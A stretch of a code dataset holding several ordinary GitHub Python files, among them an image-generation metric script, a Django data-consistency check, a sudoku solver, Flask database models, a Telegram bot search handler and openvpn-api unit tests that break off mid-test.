setup_inception_model(checkpoint['num_classes'], pretrained=checkpoint['pretrained'])\n if checkpoint['cuda_enabled']:\n loaded_model = loaded_model.cuda()\n cudnn.benchmark = True\n loaded_model.load_state_dict(checkpoint['state_dict'])\n loaded_model.eval()\n\n\n@click.command()\n@click.option('--img-dir', type=click.Path(exists=True, dir_okay=True, readable=True), required=True)\n@click.option('--model-path', type=click.Path(exists=True, file_okay=True, readable=True), required=True)\n@click.option('--dataset-hdf5', type=click.Path(exists=True, file_okay=True, readable=True), required=True)\n@click.option('--dataset', type=str, required=False)\ndef calculate_inception_objects_accuracy(img_dir, model_path, dataset_hdf5, dataset):\n if loaded_model is None:\n _init_inception(model_path)\n test_transforms = transforms.Compose([transforms.Resize(299),\n transforms.ToTensor()])\n dataset = ImageFolderNonGT(img_dir, transform=test_transforms, labelfile=dataset_hdf5)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1)\n with torch.no_grad():\n jss, avg_precision, avg_recall, avg_f1, cs, graph_similarity = get_obj_det_acc(dataloader, dataset)\n print('\\nNumber of images used: {}\\nJSS: {}\\n AP: {}\\nAR: {}\\n F1: {}\\nCS: {}\\nGS: {}'.format(len(dataset), jss,\n avg_precision, avg_recall,\n avg_f1, cs,\n graph_similarity))\n return jss, avg_precision, avg_recall, avg_f1, cs, graph_similarity\n\n\nif __name__ == '__main__':\n calculate_inception_objects_accuracy()\n","repo_name":"Maluuba/GeNeVA","sub_path":"geneva/metrics/inception_localizer.py","file_name":"inception_localizer.py","file_ext":"py","file_size_in_byte":10343,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"35"} +{"seq_id":"23365149688","text":"import logging\nimport operator\nimport os\nimport sys\nfrom collections import Counter\n\nfrom django.db.models import Count\nfrom django.core.management.base import BaseCommand\nfrom opencivicdata.core.models import Jurisdiction, Membership, Organization, Person, Post, MembershipContactDetail\n\nfrom reports.utils import module_name_to_metadata\n\nlog = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = 'Checks the consistency of documents per jurisdiction'\n\n def add_arguments(self, parser):\n parser.add_argument('module', nargs='?')\n\n def handle(self, *args, **options):\n sys.path.append(os.path.abspath('scrapers'))\n\n empty_organizations = {'Parliament of Canada', 'Senate'}\n\n if options['module']:\n division_id = module_name_to_metadata(options['module'])['division_id']\n jurisdictions = Jurisdiction.objects.filter(division_id=division_id)\n else:\n # Exclude candidate scrapers.\n jurisdictions = Jurisdiction.objects.exclude(classification='executive')\n\n organizations = Organization.objects.filter(jurisdiction__in=jurisdictions)\n posts = Post.objects.filter(organization__in=organizations)\n people = Person.objects.filter(memberships__organization__in=organizations)\n memberships = Membership.objects.filter(person_id__in=people)\n contact_details = MembershipContactDetail.objects.filter(membership__in=memberships)\n\n # A person has multiple memberships.\n jurisdiction_with_repetition = {\n 'ocd-jurisdiction/country:ca/cd:3521/legislature': 4, # Peel, due to Brampton\n 'ocd-jurisdiction/country:ca/csd:3521010/legislature': 4, # Brampton\n }\n\n post_memberships_count = posts.values('id').annotate(count=Count('memberships'))\n\n # Validate the number of organizations per jurisdiction.\n results = jurisdictions.values('id').annotate(count=Count('organizations')).exclude(count=1)\n # The Parliament of Canada has three organizations.\n if len(results) > 1 or results and results[0] != {'count': 3, 'id': 'ocd-jurisdiction/country:ca/legislature'}:\n log.error('{} jurisdictions do not have one organization'.format(len(results)))\n for result in results:\n log.info('{} {}'.format(result['count'], result['id']))\n\n # Validate the presence of posts and memberships on organizations.\n results = set(organizations.values('id').exclude(classification__in=('committee', 'party')).annotate(count=Count('posts')).filter(count=0).values_list('name', flat=True)) - empty_organizations\n self.report_value('non-committee, non-party organizations have no posts', results)\n results = set(organizations.values('id').exclude(classification='committee').annotate(count=Count('memberships')).filter(count=0).values_list('name', flat=True)) - empty_organizations\n self.report_value('non-committee organizations have no memberships', results)\n\n # Validate the number of memberships per post.\n results = Counter(post_memberships_count.filter(count=0).values_list('organization__name', flat=True))\n self.report_count('organizations have posts with no memberships (seats may be vacant)', results)\n results = Counter(post_memberships_count.filter(count__gt=1).values_list('organization__name', flat=True))\n self.report_count('organizations have posts with many memberships', results)\n\n # Validate the presence of posts on memberships.\n results = Counter(memberships.filter(post_id=None).exclude(organization__classification='party').values_list('organization__name', flat=True))\n self.report_count('non-party organizations have memberships with no posts', results)\n\n # Validate that people have at most one post-membership.\n results = people.values('id').exclude(memberships__organization__classification='party').exclude(memberships__organization__jurisdiction_id__in=jurisdiction_with_repetition.keys()).annotate(count=Count('memberships')).exclude(count=1).values_list('name', flat=True)\n self.report_value('people have many non-party memberships', results)\n for jurisdiction_id, threshold in jurisdiction_with_repetition.items():\n results = people.values('id').exclude(memberships__organization__classification='party').filter(memberships__organization__jurisdiction_id=jurisdiction_id).annotate(count=Count('memberships')).exclude(count__lte=threshold).values_list('name', flat=True)\n self.report_value('people have many non-party memberships in {}'.format(jurisdiction_id), results)\n\n # Validate that people have at most one party-membership.\n results = people.values('id').filter(memberships__organization__classification='party').annotate(count=Count('memberships')).exclude(count=1).values_list('name', flat=True)\n self.report_value('people have many party memberships', results)\n\n # Validate the uniqueness of names and images.\n people_without_repetition = people.exclude(memberships__organization__jurisdiction_id__in=jurisdiction_with_repetition.keys())\n results = self.repeated(people_without_repetition.values_list('name', flat=True))\n self.report_count('names are repeated across people', results)\n results = self.repeated(people_without_repetition.exclude(image='').values_list('image', flat=True))\n self.report_count('images are repeated across people', results)\n for jurisdiction_id, threshold in jurisdiction_with_repetition.items():\n people_with_repetition = people.filter(memberships__organization__jurisdiction_id=jurisdiction_id)\n results = self.repeated(people_with_repetition.values_list('name', flat=True), threshold=threshold)\n self.report_count('names are repeated across people in {}'.format(jurisdiction_id), results)\n results = self.repeated(people_with_repetition.exclude(image='').values_list('image', flat=True), threshold=threshold)\n self.report_count('images are repeated across people in {}'.format(jurisdiction_id), results)\n\n # Validate the uniqueness of link URLs.\n results = self.repeated(people.exclude(links__url=None).values_list('links__url', flat=True))\n self.report_count('link URLs are repeated across people', results)\n\n # Validate the uniqueness of email contact detail values.\n results = self.repeated(contact_details.filter(type='email').exclude(membership__organization__jurisdiction_id__in=jurisdiction_with_repetition.keys()).values_list('value', flat=True))\n self.report_count('emails are repeated across membership contact details', results)\n for jurisdiction_id, threshold in jurisdiction_with_repetition.items():\n results = self.repeated(contact_details.filter(type='email').filter(membership__organization__jurisdiction_id=jurisdiction_id).values_list('value', flat=True), threshold=threshold)\n self.report_count('emails are repeated across membership contact details in {}'.format(jurisdiction_id), results)\n\n # Validate presence of email contact detail.\n jurisdiction_with_no_email = [\n # Javascript-encoded email\n 'ocd-jurisdiction/country:ca/csd:1217030/legislature', # Cape Breton\n # Webform email\n 'ocd-jurisdiction/country:ca/csd:2423027/legislature', # Québec\n 'ocd-jurisdiction/country:ca/csd:2464008/legislature', # Terrebonne\n 'ocd-jurisdiction/country:ca/csd:3524009/legislature', # Milton\n 'ocd-jurisdiction/country:ca/csd:3530016/legislature', # Waterloo\n 'ocd-jurisdiction/country:ca/csd:3530027/legislature', # Wellesley\n 'ocd-jurisdiction/country:ca/csd:3530035/legislature', # Woolwich\n 'ocd-jurisdiction/country:ca/csd:4706027/legislature', # Regina\n 'ocd-jurisdiction/country:ca/csd:4711066/legislature', # Saskatoon\n 'ocd-jurisdiction/country:ca/csd:4806016/legislature', # Calgary\n 'ocd-jurisdiction/country:ca/csd:5909052/legislature', # Abbotsford\n ]\n leaders_with_no_email = {\n 'ocd-jurisdiction/country:ca/cd:3521/legislature', # Peel\n 'ocd-jurisdiction/country:ca/csd:2437067/legislature', # Trois-Rivières\n 'ocd-jurisdiction/country:ca/csd:2456083/legislature', # Saint-Jean-sur-Richelieu\n 'ocd-jurisdiction/country:ca/csd:2494068/legislature', # Saguenay\n 'ocd-jurisdiction/country:ca/csd:3520005/legislature', # Toronto\n 'ocd-jurisdiction/country:ca/csd:3521024/legislature', # Caledon\n 'ocd-jurisdiction/country:ca/csd:3530013/legislature', # Kitchener\n 'ocd-jurisdiction/country:ca/csd:4811061/legislature', # Edmonton\n 'ocd-jurisdiction/country:ca/csd:4816037/legislature', # Wood Buffalo\n 'ocd-jurisdiction/country:ca/csd:5909052/legislature', # Abbotsford\n 'ocd-jurisdiction/country:ca/csd:5915004/legislature', # Surrey\n }\n jurisdiction_ids = jurisdictions.exclude(id__in=jurisdiction_with_no_email).values_list('id', flat=True)\n for jurisdiction_id in jurisdiction_ids:\n for organization in organizations.filter(jurisdiction_id=jurisdiction_id):\n # It's ridiculous that Django can't do a LEFT OUTER JOIN with a WHERE clause.\n memberships_with_no_email = sum(not membership.contact_details.filter(type='email').count() for membership in organization.memberships.all())\n if memberships_with_no_email > 1 or memberships_with_no_email and jurisdiction_id not in leaders_with_no_email:\n log.error('{:2} memberships have no email in {}'.format(memberships_with_no_email, organization.name))\n\n def repeated(self, results, *, threshold=1):\n return {value: count for value, count in Counter(results).items() if count > threshold}\n\n def report_value(self, message, results):\n if results:\n log.error('{} {}:'.format(len(results), message))\n for value in results:\n log.info(value)\n log.info('---')\n\n def report_count(self, message, results):\n if results:\n log.error('{} {}:'.format(len(results), message))\n for value, count in sorted(results.items(), key=operator.itemgetter(1), reverse=True):\n log.info('{:2} {}'.format(count, value))\n log.info('---')\n","repo_name":"opennorth/scrapers_ca_app","sub_path":"reports/management/commands/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":10537,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"19067538440","text":"# at end of row, row +=1 col = 0, else col += 1\n# for loop, if you can put c, put c\n# then call recursive function again until returns true\n# if it doens't return true, put '.'\n# canput function see if entire row or col has char\n# see if if it's in rowGroup+3 and colGroup+3\n\nclass Solution:\n\t# @param A : list of list of chars\n\t# @return nothing\n\tdef solveSudoku(self, board):\n\t\tself.solveSudokuRec(board, 0, 0)\n\tdef solveSudokuRec(self, board, row, col):\n\t\tif row == 9:\n\t\t\treturn True\n\t\tif col == 8:\n\t\t\tnextRow = row+1\n\t\t\tnextCol = 0\n\t\telse:\n\t\t\tnextRow = row\n\t\t\tnextCol = col+1\n\t\tif board[row][col] != '.':\n\t\t\treturn self.solveSudokuRec(board, nextRow, nextCol)\n\t\tfor c in xrange(1, 10):\n\t\t\tif self.canPut(board, str(c), row, col):\n\t\t\t\tboard[row][col] = str(c)\n\t\t\t\tif self.solveSudokuRec(board, nextRow, nextCol):\n\t\t\t\t\treturn True\n\t\t\t\tboard[row][col] = '.'\n\t\treturn False\n\tdef canPut(self, board, char, row, col):\n\t\tfor i in xrange(0, 9):\n\t\t\tif board[row][i] == char or board[i][col] == char:\n\t\t\t\treturn False\n\t\n\t\t\trowGroup = (row//3) * 3\t\t# floor division 8 is in group 6-9\n\t\t\tcolGroup = (col//3) * 3\t\t# group 0, 3, 6\n\t\t\tfor i in xrange(rowGroup, rowGroup + 3):\n\t\t\t\tfor j in xrange(colGroup, colGroup+3):\n\t\t\t\t\tif board[i][j] == char:\n\t\t\t\t\t\treturn False\n\t\treturn True\n\"\"\"\nWrite a program to solve a Sudoku puzzle by filling the empty cells.\nEmpty cells are indicated by the character '.' \nYou may assume that there will be only one unique solution.\n\n\n\nA sudoku puzzle,\n\n\n\nand its solution numbers marked in red.\n\nExample :\n\nFor the above given diagrams, the corresponding input to your program will be\n\n[[53..7....], [6..195...], [.98....6.], [8...6...3], [4..8.3..1], [7...2...6], [.6....28.], [...419..5], [....8..79]]\nand we would expect your program to modify the above array of array of characters to\n\n[[534678912], [672195348], [198342567], [859761423], [426853791], [713924856], [961537284], [287419635], [345286179]]\n\"\"\"","repo_name":"sample-apps/interviewBit","sub_path":"Java & Python/backtracking/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26569873208","text":"def notas(*args, sit=False):\r\n dicionario = dict()\r\n listnotas = [n for n in args if isinstance(n, (int, float))]\r\n total = len(listnotas)\r\n soma = sum(listnotas)\r\n media = soma / total if total > 0 else 0\r\n dicionario['total'] = total\r\n dicionario['maior'] = max(listnotas) if total > 0 else 0\r\n dicionario['menor'] = min(listnotas) if total > 0 else 0\r\n dicionario['media'] = media\r\n if sit:\r\n if media < 5:\r\n dicionario['situação'] = 'RUIM'\r\n elif 5 <= media <= 7:\r\n dicionario['situação'] = 'RAZOÁVEL'\r\n else:\r\n dicionario['situação'] = 'BOM'\r\n return dicionario\r\n\r\n\r\n# Programa Principal\r\nresp = notas(5.5, 2.5, 1.5, sit=True)\r\nprint(resp)\r\n","repo_name":"matteusmoreno/ProjetosIniciaisPython","sub_path":"Exercícios Python 100 - 106/EX105.py","file_name":"EX105.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38965468525","text":"from application import db\n\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128))\n email = db.Column(db.String(64))\n user_type = db.Column(db.String(32))\n given_name = db.Column(db.String(32))\n family_name = db.Column(db.String(32))\n phone = db.Column(db.String(15))\n company = db.Column(db.String(15))\n address = db.Column(db.String(256))\n city = db.Column(db.String(32))\n state = db.Column(db.String(2))\n zipcode = db.Column(db.String(5))\n linkedin = db.Column(db.String(256))\n website = db.Column(db.String(256))\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.email = kwargs.get('email', \"\")\n self.user_type = kwargs.get('user_type', \"\")\n self.given_name = kwargs.get('given_name', \"\")\n self.family_name = kwargs.get('family_name', \"\")\n self.phone = kwargs.get('phone', \"\")\n self.company = kwargs.get('company', \"\")\n self.address = kwargs.get('address', \"\")\n self.city = kwargs.get('city', \"\")\n self.state = kwargs.get('state', \"\")\n self.zipcode = kwargs.get('zipcode', \"\")\n self.linkedin = kwargs.get('linkedin', \"\")\n self.website = kwargs.get('website', \"\")\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.query(User).filter(User.uid == self.uid)\\\n .update({User.uid: self.uid,\n User.email: self.email,\n User.user_type: self.user_type,\n User.given_name: self.given_name,\n User.family_name: self.family_name,\n User.phone: self.phone,\n User.company: self.company,\n User.address: self.address,\n User.city: self.city,\n User.state: self.state,\n User.zipcode: self.zipcode,\n User.linkedin: self.linkedin,\n User.website: self.website})\n db.session.commit()\n\n def exist(self):\n for row in db.session.query(User).filter(User.uid == self.uid):\n return True\n return False\n\n def profile(self):\n return db.session.query(User).filter(User.uid == self.uid).first()\n\n def tojson(self):\n return {'email': self.email,\n 'user_type': self.user_type,\n 'given_name': self.given_name,\n 'family_name': self.family_name,\n 'phone': self.phone,\n 'company': self.company,\n 'address': self.address,\n 'city': self.city,\n 'state': self.state,\n 'zipcode': self.zipcode,\n 'linkedin': self.linkedin,\n 'website': self.website}\n\n\nclass Skill(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128))\n skill_list = db.Column(db.String(1024))\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.skill_list = kwargs.get('skill_list', \"\")\n\n def exist(self):\n for row in db.session.query(Skill).filter(Skill.uid == self.uid):\n return True\n return False\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.query(Skill).filter(Skill.uid == self.uid)\\\n .update({Skill.skill_list: self.skill_list})\n db.session.commit()\n\n def skills(self):\n return db.session.query(Skill).filter(Skill.uid == self.uid).first()\n\n def tojson(self):\n return {'skill_list': self.skill_list}\n\n\nclass Role(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128))\n role_list = db.Column(db.String(512))\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.role_list = kwargs.get('role_list', \"\")\n\n def exist(self):\n for row in db.session.query(Role).filter(Role.uid == self.uid):\n return True\n return False\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.query(Role).filter(Role.uid == self.uid)\\\n .update({Role.role_list: self.role_list})\n db.session.commit()\n\n def roles(self):\n return db.session.query(Role).filter(Role.uid == self.uid).first()\n\n def tojson(self):\n return {'role_list': self.role_list}\n\n\nclass Work(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128))\n work_list = db.Column(db.String(2048))\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.work_list = kwargs.get('work_list', \"\")\n\n def exist(self):\n for row in db.session.query(Work).filter(Work.uid == self.uid):\n return True\n return False\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.query(Work).filter(Work.uid == self.uid)\\\n .update({Work.work_list: self.work_list})\n db.session.commit()\n\n def works(self):\n return db.session.query(Work).filter(Work.uid == self.uid).first()\n\n def tojson(self):\n return {'work_list': self.work_list}\n\n\nclass Project(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n pid = db.Column(db.String(256)) # md5(project_name)\n name = db.Column(db.String(256))\n uid = db.Column(db.String(256)) # Poster uid\n status = db.Column(db.String(256))\n description = db.Column(db.String(1024))\n budget = db.Column(db.Integer)\n creator = db.Column(db.String(256))\n folder = db.Column(db.String(128))\n create_time = db.Column(db.DateTime, default=db.func.now())\n\n def __init__(self, **kwargs):\n self.id = kwargs.get('id', \"\")\n self.pid = kwargs.get('pid', \"\")\n self.name = kwargs.get('name', \"\")\n self.uid = kwargs.get('uid', \"\") # Poster uid\n self.status = kwargs.get('status', \"\")\n self.description = kwargs.get('description', \"\")\n self.budget = kwargs.get('budget', \"\")\n self.creator = kwargs.get('creator', \"\")\n self.folder = kwargs.get('folder', \"\")\n\n def exist(self):\n for row in db.session.query(Project).filter(Project.uid == self.uid)\\\n .filter(Project.pid == self.pid):\n return True\n return False\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def list(self):\n project_list = []\n for row in db.session.query(Project).filter(Project.uid == self.uid):\n project_list.append({'name': row.name,\n 'status': row.status,\n 'create_time': row.create_time,\n 'budget': row.budget})\n return project_list\n\n\nclass PRZ(db.Model):\n \"\"\"PRZ(Project Running Zone)\"\"\"\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128)) # Poster uid\n pid = db.Column(db.String(128)) # md5(project_name)\n creator = db.Column(db.String(256))\n status = db.Column(db.String(256))\n offer_price = db.Column(db.Integer)\n accept_price = db.Column(db.Integer)\n final_price = db.Column(db.Integer)\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.pid = kwargs.get('pid', \"\")\n self.creator = kwargs.get('creator', \"\")\n self.status = kwargs.get('status', \"\")\n self.offer_price = kwargs.get('offer_price', \"\")\n self.accept_price = kwargs.get('accept_price', \"\")\n self.final_price = kwargs.get('final_price', \"\")\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n\nclass PH(db.Model):\n \"\"\"Project History\"\"\"\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128))\n pid = db.Column(db.String(128))\n log_tpye = db.Column(db.String(1024))\n log = db.Column(db.String(1024))\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.pid = kwargs.get('pid', \"\")\n self.log_type = kwargs.get('log_type', \"\")\n self.log = kwargs.get('log', \"\")\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"pangjie/fmx_creator_sample","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9699048628","text":"x = (x**2 for x in range(4))\n\nfor item in x:\n print('1:', item)\n\n# x = (x**2 for x in range(4))\n# print('2:', next(x))\n\n# for item in x:\n# print('3:', item)\n\n\n","repo_name":"helga20/LNU_ProgrammingPython","sub_path":"Lectures/08/_08_iterators/_02_iter_for.py","file_name":"_02_iter_for.py","file_ext":"py","file_size_in_byte":166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"25087720865","text":"from api.imports import *\nfrom api.variables import *\nfrom api.bot_error import *\n\nasync def search(\n update: Update,\n context: ContextTypes.DEFAULT_TYPE\n) -> list[tuple]:\n \"\"\"Search the user's message.\"\"\" \n\n global filename, msg_id, link_list, page_number, page_size, start_index, end_index, enum_link_list\n\n page_size = 10\n\n # Set the current page number\n page_number = 1\n \n # Calculate the start and end indices for the current page\n start_index = (page_number - 1) * page_size\n end_index = start_index + page_size\n\n link_list, msg_id, filename, title, performer = [], [], [], [], []\n\n try:\n for k, v in data.items():\n if (re.search(\n update.message.text,\n v.get('filename'),\n re.IGNORECASE)\n ):\n msg_id.append(k)\n filename.append(v.get('filename'))\n title.append(v.get('title'))\n performer.append(v.get('performer'))\n \n except AttributeError as e:\n e\n \n keyboard = [\n [\n InlineKeyboardButton(\n \"<\",\n callback_data=\"1\"\n ),\n \n InlineKeyboardButton(\n \">\",\n callback_data=\"2\"\n ),\n ]\n ]\n \n reply_markup = InlineKeyboardMarkup(keyboard)\n\n COUNT = 0\n link = re.search(r\"(t\\.me\\/[a-zA-Z0-9_]{5,32})\", update.message.text)\n\n for i in range(len(filename)):\n link_str = \"[{}]({})\\n\".format(\n filename[i],\n dcr8_url+\"{}\".format(msg_id[i])\n )\n link_list.append(link_str)\n\n enum_link_list = [\n \"{}. {}\".format(i, link_str) for i,\n link_str in enumerate(link_list, start=1)\n ]\n # Slice the list to get the items for the current page\n current_page = enum_link_list[start_index:end_index] \n try:\n for i in range(page_size):\n text = \"{} - {} of {}\\n{}\".format(\n page_number,\n page_size,\n len(filename),\n \"\\n\".join(current_page)\n )\n \n await update.message.reply_text(\n text,\n reply_markup=reply_markup,\n parse_mode=ParseMode.MARKDOWN\n )\n except (BadRequest, IndexError, AttributeError) as e:\n if link:\n await update.message.reply_text(\n \"use this bot to download songs: \\nt.me/decr8test_bot\"\n )\n else:\n await update.message.reply_text(\n \"Not found.\\n\\n{}\".format(e)\n ) \n \n return msg_id, performer, title, filename, enum_link_list\n\nasync def search_buttons(\n update: Update,\n context: ContextTypes.DEFAULT_TYPE\n) -> None:\n\n global filename, msg_id, link_list, page_number, page_size, start_index, end_index\n \n query = update.callback_query\n \n # CallbackQueries need to be answered, even if no notification to the user is needed\n # Some clients may have trouble otherwise. See https://core.telegram.org/bots/api#callbackquery\n query.answer(text=\"🤖\") \n keyboard = [\n [\n InlineKeyboardButton(\"<\", callback_data=\"1\"),\n InlineKeyboardButton(\">\", callback_data=\"2\")\n ]\n ]\n reply_markup = InlineKeyboardMarkup(keyboard)\n\n if query.data == \"1\":\n page_number -= 1\n start_index = (page_number - 1) * page_size\n end_index = start_index + page_size\n prev_page = enum_link_list[start_index:end_index]\n\n for i in range(page_size):\n text = \"{} - {} of {}\\n{}\".format(\n page_number,\n page_size,\n len(filename),\n \"\\n\".join(prev_page)\n )\n await query.edit_message_text(\n text,\n reply_markup=reply_markup,\n parse_mode=ParseMode.MARKDOWN\n )\n \n elif query.data == '2':\n page_number += 1\n start_index = (page_number - 1) * page_size\n end_index = start_index + page_size\n next_page = enum_link_list[start_index:end_index]\n\n for i in range(page_size):\n text = \"{} - {} of {}\\n{}\".format(\n page_number,\n page_size,\n len(filename),\n \"\\n\".join(next_page)\n )\n # text += link_str\n \n await query.edit_message_text(\n text,\n reply_markup=reply_markup,\n parse_mode=ParseMode.MARKDOWN\n )\n \nasync def inlinequery(\n update: Update,\n context: ContextTypes.DEFAULT_TYPE\n) -> None:\n \"\"\"Handle the inline query.\"\"\"\n query = update.inline_query.query\n results = []\n\n for k, v in data.items():\n if re.search(query, v.get(\"filename\"), re.IGNORECASE):\n results.append(\n InlineQueryResultAudio(\n id=uuid4(),\n audio_url=\"{}{}\".format(dcr8_url, k),\n title=\"{}\".format(v.get(\"title\"))\n ),\n ) \n await update.inline_query.answer(results, auto_pagination=True)\n\nasync def cancel(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\n \"\"\"Cancels and ends the conversation.\"\"\"\n user = update.message.from_user\n logger.info(\"User %s canceled the conversation.\", user.first_name)\n await update.message.reply_text(\n \"Bye!\", reply_markup=ReplyKeyboardRemove()\n )\n\n return ConversationHandler.END\n","repo_name":"Davicii-ii/decr8","sub_path":"api/bot_non_commands.py","file_name":"bot_non_commands.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39377966573","text":"import unittest\nimport socket\nfrom unittest.mock import patch, PropertyMock, ANY, MagicMock\nimport openvpn_status\nfrom openvpn_api.util import errors\nfrom openvpn_api.vpn import VPN, VPNType\n\n\ndef gen_mock_values(values):\n \"\"\"Generator to return the next value in a list of values on every call.\n\n >>> vals = gen_mock_values([1, 2, 3])\n >>> mocked_func.side_effect = lambda: next(vals)\n >>> mocked_func()\n 1\n >>> mocked_func()\n 2\n \"\"\"\n for value in values:\n yield value\n\n\nclass TestVPNModel(unittest.TestCase):\n \"\"\"Test the config file parser monitor.util.config_parser.ConfigParser\n \"\"\"\n\n def test_host_port_socket(self):\n with self.assertRaises(errors.VPNError) as ctx:\n VPN(host=\"localhost\", port=1234, unix_socket=\"file.sock\")\n self.assertEqual(\"Must specify either socket or host and port\", str(ctx.exception))\n\n def test_host_port(self):\n vpn = VPN(host=\"localhost\", port=1234)\n self.assertEqual(vpn._mgmt_host, \"localhost\")\n self.assertEqual(vpn._mgmt_port, 1234)\n self.assertEqual(vpn.type, VPNType.IP)\n self.assertEqual(vpn.mgmt_address, \"localhost:1234\")\n\n def test_socket(self):\n vpn = VPN(unix_socket=\"file.sock\")\n self.assertEqual(vpn._mgmt_socket, \"file.sock\")\n self.assertEqual(vpn.type, VPNType.UNIX_SOCKET)\n self.assertEqual(vpn.mgmt_address, \"file.sock\")\n\n def test_initialisation(self):\n vpn = VPN(unix_socket=\"file.sock\")\n self.assertIsNone(vpn._release)\n self.assertIsNone(vpn._socket)\n\n @patch(\"openvpn_api.vpn.socket.create_connection\")\n def test_connect_ip_failure(self, mock_create_connection):\n vpn = VPN(host=\"localhost\", port=1234)\n mock_create_connection.side_effect = socket.error()\n with self.assertRaises(errors.ConnectError):\n vpn.connect()\n mock_create_connection.side_effect = socket.timeout()\n with self.assertRaises(errors.ConnectError):\n vpn.connect()\n\n @patch(\"openvpn_api.vpn.VPN.connect\")\n @patch(\"openvpn_api.vpn.VPN.disconnect\")\n def test_connection_manager(self, mock_disconnect, mock_connect):\n vpn = VPN(host=\"localhost\", port=1234)\n with vpn.connection():\n mock_connect.assert_called_once()\n mock_disconnect.assert_not_called()\n mock_connect.reset_mock()\n mock_connect.assert_not_called()\n mock_disconnect.assert_called_once()\n\n def test_send_command_disconnected(self):\n vpn = VPN(host=\"localhost\", port=1234)\n with self.assertRaises(errors.NotConnectedError):\n vpn.send_command(\"asd\")\n\n @patch(\"openvpn_api.vpn.VPN._socket_recv\")\n @patch(\"openvpn_api.vpn.VPN._socket_send\")\n @patch(\"openvpn_api.vpn.socket.create_connection\")\n def test_send_command(self, mock_create_connection, mock_socket_send, mock_socket_recv):\n vpn = VPN(host=\"localhost\", port=1234)\n vpn.connect()\n mock_create_connection.assert_called_once_with((\"localhost\", 1234), timeout=ANY)\n mock_socket_recv.assert_called_once()\n mock_socket_recv.reset_mock()\n vals = gen_mock_values([\"asd\\n\", \"END\\n\"])\n mock_socket_recv.side_effect = lambda: next(vals)\n a = vpn.send_command(\"help\")\n mock_socket_send.assert_called_once_with(\"help\\n\")\n self.assertEqual(2, mock_socket_recv.call_count)\n self.assertEqual(a, \"asd\\nEND\\n\")\n\n @patch(\"openvpn_api.vpn.VPN._socket_recv\")\n @patch(\"openvpn_api.vpn.VPN._socket_send\")\n @patch(\"openvpn_api.vpn.socket.create_connection\")\n def test_send_command_kill(self, mock_create_connection, mock_socket_send, mock_socket_recv):\n # This test just makes sure we don't infinitely loop reading from socket waiting for END\n # Needs rewriting once we add methods for killing clients.\n # Example output from management interface:\n # client-kill 1\n # SUCCESS: client-kill command succeeded\n # kill 1.2.3.4:12345\n # SUCCESS: 1 client(s) at address 1.2.3.4:12345 killed\n vpn = VPN(host=\"localhost\", port=1234)\n vpn.connect()\n mock_create_connection.assert_called_once_with((\"localhost\", 1234), timeout=ANY)\n mock_socket_recv.assert_called_once()\n mock_socket_recv.reset_mock()\n mock_socket_recv.return_value = \"SUCCESS: 1 client(s) at address 1.2.3.4:12345 killed\"\n vpn.send_command(\"kill 1.2.3.4:12345\")\n mock_socket_send.assert_called_once_with(\"kill 1.2.3.4:12345\\n\")\n mock_socket_recv.assert_called_once()\n mock_socket_send.reset_mock()\n mock_socket_recv.reset_mock()\n mock_socket_recv.return_value = \"SUCCESS: client-kill command succeeded\"\n vpn.send_command(\"client-kill 1\")\n mock_socket_send.assert_called_once_with(\"client-kill 1\\n\")\n mock_socket_recv.assert_called_once()\n\n @patch(\"openvpn_api.vpn.VPN._socket_recv\")\n @patch(\"openvpn_api.vpn.VPN._socket_send\")\n @patch(\"openvpn_api.vpn.socket.create_connection\")\n def test_send_sigterm(self, mock_create_connection, mock_socket_send, mock_socket_recv):\n vpn = VPN(host=\"localhost\", port=1234)\n vpn.connect()\n mock_create_connection.assert_called_once_with((\"localhost\", 1234), timeout=ANY)\n mock_socket_recv.assert_called_once()\n mock_socket_recv.reset_mock()\n mock_socket_recv.return_value = \"SUCCESS: signal SIGTERM thrown\"\n 